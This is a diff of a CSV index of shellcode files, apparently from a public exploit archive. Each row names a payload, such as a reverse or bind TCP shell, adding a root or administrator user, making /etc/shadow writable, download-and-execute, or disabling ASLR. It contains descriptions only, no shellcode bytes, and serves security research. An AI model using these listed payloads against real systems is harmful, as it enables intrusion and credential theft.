14014,shellcodes/windows_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,windows_x86
13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
@ -389,46 +389,46 @@ id,file,description,date,author,type,platform
14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
14873,shellcodes/windows_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,windows_x86
14873,shellcodes/windows_x86/14873.asm,"Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-01,dijital1,shellcode,windows_x86
14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
15063,shellcodes/windows_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
15116,shellcodes/arm/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
15202,shellcodes/windows_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15203,shellcodes/windows_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15063,shellcodes/windows_x86/15063.c,"Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
15116,shellcodes/arm/15116.cpp,"Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
15202,shellcodes/windows_x86/15202.c,"Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15203,shellcodes/windows_x86/15203.c,"Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
15879,shellcodes/windows_x86/15879.txt,"Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
16283,shellcodes/windows_x86/16283.txt,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
17545,shellcodes/windows_x86/17545.txt,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
@ -438,7 +438,7 @@ id,file,description,date,author,type,platform
18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
@ -446,54 +446,54 @@ id,file,description,date,author,type,platform
21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm
21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm
40363,shellcodes/windows_x86/40363.c,"Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
22489,shellcodes/windows/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
40890,shellcodes/windows_x86-64/40890.c,"Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
22489,shellcodes/windows/22489.cpp,"Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
40890,shellcodes/windows_x86-64/40890.c,"Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86
24318,shellcodes/windows/24318.c,"Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
24318,shellcodes/windows/24318.c,"Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
40387,shellcodes/hardware/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
27180,shellcodes/arm/27180.asm,"Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
40334,shellcodes/windows_x86/40334.c,"Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
40334,shellcodes/windows_x86/40334.c,"Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
28996,shellcodes/windows/28996.c,"Windows - MessageBox + Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35793,shellcodes/windows_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
35794,shellcodes/windows_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
35794,shellcodes/windows_x86-64/35794.txt,"Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
36411,shellcodes/generator/36411.txt,"Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86
36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86
36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86
36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator
36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86
36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86
36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86
36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86
36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve(/bin/sh) Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86
36779,shellcodes/windows_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36780,shellcodes/windows_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36779,shellcodes/windows_x86/36779.c,"Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36780,shellcodes/windows_x86/36780.c,"Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
@ -504,22 +504,22 @@ id,file,description,date,author,type,platform
37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
